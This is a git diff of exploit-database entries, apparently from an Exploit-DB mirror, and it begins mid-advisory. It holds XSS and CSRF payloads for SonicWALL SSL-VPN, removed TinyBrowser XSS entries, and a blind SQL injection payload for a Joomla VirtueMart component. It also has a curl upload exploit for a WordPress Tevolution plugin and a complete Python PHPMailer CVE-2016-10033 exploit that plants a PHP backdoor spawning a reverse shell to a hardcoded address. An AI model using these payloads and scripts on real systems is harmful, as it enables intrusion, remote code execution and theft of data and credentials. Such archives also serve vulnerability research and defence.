 bypassed via form-based CSRF.
 Tested on: SonicWALL SSL-VPN Web Server
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5392
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php
 Firmware fixed: 8.1.0.3
 Issue ID: 172692
 http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869
 26.01.2016
 --
 Reflected XSS via protocol parameter (GET):
 -------------------------------------------
 https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:</script><img%20src=a%20onerror=confirm(1)>&bmId=55
 XSS via arbitrary parameter (GET):
 ----------------------------------
 https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&<script>alert(2)</script>=zsl
 XSS via REMOTEPATH parameter (GET):
 -----------------------------------
 https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/</script><img%20src=a%20onerror=confirm(3)>&bmId=59
 WAF Cross-Site Request Forgery PoC:
 -----------------------------------
 POST /cgi-bin/editBookmark HTTP/1.1
 Host: 127.0.0.1
 bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK
--- a/platforms/php/webapps/38180.txt
+++ b/platforms/php/webapps/38180.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/57230/info
 TinyBrowser is prone to multiple vulnerabilities.
 An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) 
--- a/platforms/php/webapps/38181.txt
+++ b/platforms/php/webapps/38181.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/57230/info
 TinyBrowser is prone to multiple vulnerabilities.
 An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 http://www.example.com/site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)// 
--- a/platforms/php/webapps/40973.txt
+++ b/platforms/php/webapps/40973.txt
@ -0,0 +1,24 @@
 # Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
 # Date: 28-12-2016
 # Software Link: http://awebsupport.com/products/aweb-cartwatching-system
 # Exploit Author: Javi Espejo(qemm)
 # Contact: http://twitter.com/javiespejo
 # Website: http://raipson.com 
 # CVE: REQUESTED
 # Category: webapps
 1. Description
 Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
 This the code that has the parameters with the parameters not sanitized 
 2. Proof of Concept
 option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
 3. Solution:
 Update to version 2.6.1 from the update center of joomla.
 The Joomla vel publish the vulnerability on
 Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 
 http://awebsupport.com/ 
--- a/platforms/php/webapps/40974.py
+++ b/platforms/php/webapps/40974.py
@ -0,0 +1,65 @@
 """
 # Exploit Title: PHPMailer Exploit v1.0
 # Date: 29/12/2016
 # Exploit Author: Daniel aka anarc0der
 # Version: PHPMailer < 5.2.18
 # Tested on: Arch Linux
 # CVE : CVE 2016-10033
 Description:
 Exploiting PHPMail with back connection (reverse shell) from the target
 Usage:
 1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
 2 - Config your IP for reverse shell on payload variable
 4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
 3 - Open other terminal and run the exploit: python3 anarcoder.py
 Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
 Full Advisory:
 https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
 """
 from requests_toolbelt import MultipartEncoder
 import requests
 import os
 import base64
 from lxml import html as lh
 os.system('clear')
 print("\n")
 print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
 print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
 print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
 print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
 print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
 print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
 print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
 print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
 target = 'http://localhost:8080'
 backdoor = '/backdoor.php'
 payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
 fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}
 m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
 headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}
 proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
 print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
 r = requests.post(target, data=m.to_string(),
                  headers=headers)
 print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
 r = requests.get(target+backdoor, headers=headers)
 if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
--- a/platforms/php/webapps/40976.txt
+++ b/platforms/php/webapps/40976.txt
@ -0,0 +1,24 @@
 # Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
 # Date: 30-12-2016
 # Software Link: Permium plugin
 # Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
 # Exploit Author: r3m1ck
 # Website: https://www.r3m1ck.us/
 # Category: webapps
 # Google Dork: inurl:"wp-content/plugins/Tevolution/"
 1. Description
 Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
 Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.
 2. Proof of Concept
 curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
 3. Uploaded file location:
 Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.
 ex:
 http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt